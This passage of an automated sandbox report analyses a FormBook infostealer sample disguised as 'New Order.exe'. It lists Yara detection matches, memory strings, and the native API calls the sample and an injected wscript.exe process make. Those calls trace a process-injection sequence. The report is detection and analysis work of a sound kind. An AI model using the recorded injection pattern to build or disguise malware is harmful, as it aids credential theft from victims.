          Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: wscript.exe, 00000005.00000002.902285037.0000000005AD2000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
          Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.901427699.0000000003380000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.690404186.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.645023716.00000000022A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.690073712.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.642981900.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.690378991.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.New Order.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.New Order.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New Order.exe.22a0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New Order.exe.22a0000.2.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.901427699.0000000003380000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.901427699.0000000003380000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.690404186.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.690404186.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.645023716.00000000022A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.645023716.00000000022A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.690073712.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.690073712.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.642981900.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.642981900.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.690378991.00000000009C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.690378991.00000000009C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.New Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.New Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.New Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.New Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.New Order.exe.22a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.New Order.exe.22a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.New Order.exe.22a0000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.New Order.exe.22a0000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: New Order.exe
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_004181BC NtCreateFile,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_0041826B NtReadFile,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_004182EF NtClose,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_0041839F NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C298F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C29840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C29860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C299A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C29910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C29A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C29A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C29A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C295D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C29540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C29660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C29FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C29780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C297A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C29710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C298A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C2B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C29820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C299D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C29950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C29A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C29A10 NtQuerySection,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C2A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C29B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C295F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C29560 NtWriteFile,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C29520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C2AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C296D0 NtCreateKey,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C29650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C29670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C29610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C29760 NtOpenProcess,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C29770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C2A770 NtOpenThread,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C2A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C29730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_1_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_1_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_1_004182F0 NtClose,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_1_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_1_004181BC NtCreateFile,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_1_0041826B NtReadFile,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_1_004182EF NtClose,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_1_0041839F NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05489540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054895D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05489710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05489FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05489780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05489650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05489660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054896D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054896E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05489910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054899A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05489840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05489860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05489A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05489560 NtWriteFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05489520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0548AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054895F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05489760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0548A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05489770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0548A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05489730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054897A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05489670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05489610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05489950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054899D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0548B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05489820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054898F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054898A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05489B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0548A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05489A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05489A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05489A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05489A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_033983A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_03398270 NtReadFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_033982F0 NtClose,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_033981C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0339839F NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0339826B NtReadFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_033982EF NtClose,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_033981BC NtCreateFile,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_004047D3
          Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_004061D4
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_0041C122
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_0041CB54
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00408C4D
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00408C50
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_0041BC5C
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00402D88
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_0041B626
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_0041BF31
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB28EC
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BFB090
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C120A0
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB20A8
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1002
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CBE824
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A830
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C099BF
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BEF900
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C04120
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4AEF
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB22AE
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C9FA2B
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B236
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA03DA
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CADBD2
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1ABD8
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C923E3
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1138B
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1EBB0
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0AB40
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C8CB4F
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB2B28
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4496
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF841F
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CAD466
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B477
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB25DD
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C12581
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA2D82
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BFD5E0
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE0D20
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB1D55
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB2D07
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB2EF7
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CAD616
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C06E30
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CBDFCE
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB1FF1
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_1_00401030
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_1_0041C122
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_1_0041CB54
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_1_00408C4D
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_1_00408C50
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_1_0041BC5C
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_1_00402D88
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_1_00402D90
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_1_0041B626
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_1_0041BF31
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_1_00402FB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05511D55
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05512D07
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05440D20
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_055125DD
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0545D5E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05472581
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0550D466
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0545841F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0551DFCE
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05511FF1
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0550D616
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05466E30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05512EF7
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0544F900
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05464120
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054699BF
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05501002
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0551E824
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0546A830
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_055128EC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0545B090
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054720A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_055120A8
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0546AB40
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0546A309
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05512B28
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0550DBD2
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_055003DA
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0547ABD8
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054F23E3
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0547EBB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054FFA2B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_055122AE
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0339CB54
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_03382FB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0339B626
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_03382D90
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_03382D88
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_03388C50
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_03388C4D
          Source: C:\Users\user\Desktop\New Order.exeCode function: String function: 00BEB150 appears 136 times
          Source: C:\Users\user\Desktop\New Order.exeCode function: String function: 00419F70 appears 38 times
          Source: C:\Users\user\Desktop\New Order.exeCode function: String function: 0041A0A0 appears 38 times
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 0544B150 appears 90 times
          Source: New Order.exe, 00000000.00000003.638250187.00000000099EF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs New Order.exe
          Source: New Order.exe, 00000002.00000002.690441656.0000000000A30000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs New Order.exe
          Source: New Order.exe, 00000002.00000002.690596917.0000000000CDF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs New Order.exe
          Source: New Order.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.901427699.0000000003380000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.901427699.0000000003380000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.690404186.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.690404186.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.645023716.00000000022A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.645023716.00000000022A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
